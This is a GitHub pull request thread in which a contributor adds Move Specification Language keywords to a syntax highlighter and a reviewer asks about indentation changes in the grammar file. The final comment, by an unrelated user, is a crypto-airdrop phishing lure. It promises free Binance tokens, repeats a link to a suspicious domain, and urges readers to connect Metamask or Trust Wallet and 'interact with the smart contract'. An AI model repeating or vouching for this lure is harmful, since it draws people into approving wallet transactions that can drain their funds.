### PR TITLE
per-pr

### PR DESCRIPTION
**Pull request by UIZorrot**
Hi, this a modified version of syntax highlighter, which we add some support to the MSL. It not a major change, we mainly modified these:

(1) configuration: delete “<>” as brace. It may occur error under the current move analyzer
(2) tmlanguage: add keywords for spec and new spec block

### CODE REVIEW

**Comment by damirka** [comment]
Hey @UIZorrot did you intentionally modify grammar file formatting? Can you keep the old ident so I see the diff better?

**Comment by UIZorrot** [comment]
> Hey @UIZorrot did you intentionally modify grammar file formatting? Can you keep the old ident so I see the diff better?

Yes, to add some keyword in MSL. I'll update a new version.

**Comment by damirka** [comment]
Pardon @UIZorrot, what I mean is can you keep the old formatting as is and not change the indentation?

**Comment by UIZorrot** [comment]
i'm not sure about "the indentation", i think the formatting is just the same, could you please explained it in detail?

**Comment by lukesnackcrate** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Pull request closed without merging**
